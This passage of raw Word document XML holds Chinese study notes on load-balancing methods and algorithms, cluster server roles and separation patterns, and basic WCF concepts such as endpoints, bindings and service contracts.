      </w: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分布式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么时候才会负载均衡（什么是负载均衡）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为了应对高并发的问题，因为面对大量用户的访问，单机是无法应对的，这时我们可以通过多台机器分摊压力，但我们怎么合理的分配请求呢？负载均衡就可以解决这个问题，它会根据不同的权重，当前服务器的状态，来分配IP地址给用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>负载均衡的几种实现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OSI层面，在网络7层协议基础上实现的负载均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>软件层面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>负载均衡算法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>权重轮循均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>权重随机均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>响应速度均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最少连接数均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理能力均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DNS响应均衡</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>集群</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>负载均衡服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用服务服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件系统服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>缓存服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分离模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>前后端分离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动静分离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库读写分离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务分离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>业务分离</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>故障可弹性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务一致性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中心化配置</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WCF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdan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Pr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>端点和契约之间是多对一的关系，如果使用了相同的绑定，则可以位于同一个地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务中可以通过多个端点发布同一个契约，则可以通过多个绑定对其进行访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：我们可以发布一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>basicHttpBinding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以获得广泛的互通；也可以通过使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>netTcpBinding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布这个契约，已获得更高的性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上述名字在配置文件中对应的节点名词：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务 =&gt; Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>端点 =&gt; EndPoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">地址 =&gt; Address  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>绑定 =&gt; Binding   管道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>契约 =&gt; Contract  接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>契约</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.服务契约</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>服务契约定义了服务的操作，即服务类所发布的接口方法。服务契约为服务提供正式的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="32"/>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>接口。通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="32"/>
